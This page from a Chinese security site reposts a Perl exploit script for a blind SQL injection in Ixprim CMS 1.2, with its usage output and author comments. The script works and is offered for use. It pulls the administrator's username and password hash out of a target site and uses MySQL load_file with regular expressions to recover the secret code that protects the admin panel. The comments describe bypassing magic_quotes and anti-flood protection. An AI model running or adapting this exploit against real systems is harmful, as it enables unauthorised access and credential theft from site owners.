首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
来源:acid-root.new.fr 作者:DarkFig 发布时间:2006-12-22  

#!/usr/bin/perl
#
# INFORMATIONS
# ============
# Affected.scr..: Ixprim 1.2
# Poc.ID........: 16061221
# Type..........: Blind SQL Injection
# Risk.level....: Medium
# Conditions....: load_file privilege (ixp code only)
# Src.download..: www.ixprim-cms.org
# Poc.link......: acid-root.new.fr/poc/16061221.txt
# Credits.......: DarkFig
#
#
# SCREENSHOT
# ==========
# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> =============================================
# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the adminitrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
#
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;

print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header> =============================================\n";

my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);

if(!$host) {
print STDOUT " header> Usage..: xpl.pl -host [host] -path [path]\n";
print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
exit(1);
}

$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";

my $ua = LWP::UserAgent->new();
$ua->agent('r00xzilla');
$ua->timeout(30);
$ua->proxy('[http]' => $proxh) if $proxh;

my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
$res = ($ua->request($req))->content;
print STDOUT " status> Searching if someone posted a comment\n";

# There is more than one sql injection, but this one is the most
# interesting to exploit. The parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL Rewriting option
# supported.
#
if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+) (commentaire||comment)/) {
$story_id = $2;
$bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
print STDOUT " sploit> story_id=$story_id\n";} else {
print STDOUT " status> No comment posted\n\n";
exit(1);
}

print STDOUT " status> Searching the administrator's uid\n";
$uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20limit%200,1");

print STDOUT " status> Searching the administrator's username length\n";
$admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$uid))");

print STDOUT " status> Searching the administrator's username\n";
&sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$uid");

print STDOUT " status> Searching the adminitrator's password hash\n";
&sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid");

print STDOUT " status> Searching a full path disclosure";
$req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php';
$res = ($ua->request($req))->content;
if($res =~ /in <b>(.*?)kernel(\/||\\)/) {
$fpd = $1.'mainfile.php';
print STDOUT "\n sploit> $fpd\n";} else {
print STDOUT "\n status> Can't get the full path disclosure";
exit(1);
}

# A personal code who is stored in mainfile.php protect the administration panel
#
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
#
# This code is generated by the function code() stored in install.fct.php
#
# function code($param='1')
# {
# $number = rand(1,1024);
# $temp = md5(($number*time()).$param);
# $temp = substr($temp, 0, 8);
# return $temp;
# }
#
# $param = $host.$path and $temp can be modified by the user.
# After the request sent, the script create the sql tables and the time()
# when it created them is stored in the mysql database, we can retrieve it with the sql
# injection and IF the user don't modified the generated code, we can find the personal code.
# The time during the creation of the table and the generation of the code
# is not the same, but we can try to bruteforce it with some parameters.
# But the user can change the generated code ... that's why i decided to use the sql
# injection with load_file and regexp.
#
print STDOUT " status> Searching the confidential ixp code\n";

# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php"
#
# magic_quotes_gpc=off
# ====================
# [SQL] and LOAD_FILE("C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php")
# REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]");
#
# magic_quotes_gpc=on
# ===================
# [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char(103),char(114),
# char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char(47),char(69),
# char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56),char(47),char(119),
# char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),char(109),char(45),
# char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char(47),char(109),char(97),
# char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),char(104),char(112)))
# REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),char(69),char(34),char(44),
# char(32),char(39),char([PART_OF_IXP_CODE])))
#
&sendreq(1,32,"load_file(concat(".concatchar($fpd).")) REGEXP(concat(".concatchar("IXP_CODE\", '"));
exit(1);

# Determine if the sql request return true or false.
# Modify the username's charset if it contain special char.
# sleep(2) needed for bypass the antiflood protection.
# If the username's length > 19 the exploit doesn't works.
#
sub sendreq() {

my($start,$limit,$sql) = ($_[0],$_[1],$_[2]);
my($gchar,$char) = '';

@charset=(0...9) if $sql =~ /^(length|select%20uid)/;
@charset=(a...z,0...9) if $sql =~ /^select%20uname/;
@charset=(a...f,0...9) if $sql =~ /^(select%20pass|load_file)/;

for($y=$start;$y<=$limit;$y++) {
foreach $char (@charset) {
print STDERR "\r sploit> $gchar$char";
if($sql !~ /load_file/) {
$req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);}
else {
$req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";}
sleep(2);

$res = ($ua->request($req))->content;
if($res =~ /<br \/> <div id="comments">/) {
$gchar .= $char;
last;}}

if(($sql =~ /length/) and ($gchar.$char =~ /^([0-9]+)9$/)){
last;}}

print STDERR "\n";
return $gchar.$char;
}

sub concatchar() {

my $string = shift;
my $temp = '';

for($i=0;$i<length($string);$i++) {
$temp .= "char(".ord(substr($string,$i,1)).")";
$temp .= ',' if $i != (length($string)-1);
}

return $temp;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP Advanced Transfer Manager
·Http explorer Web Server 1.02
·MS Windows (MessageBox) Memory
·DREAM FTP Server 1.0.2 (PORT)
·RealPlayer 10.5 (ActiveX Contr
·IXM Easy Personal FTP Server 5
·Exploits WinFtp Server Version
·Enthrallweb ePages (actualpic.
·Hewlett-Packard FTP Print Serv
·File Upload Manager <= 1.0.
·Hewlett-Packard FTP Print Serv
·Newsletter MX <= 1.0.2 (ID)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved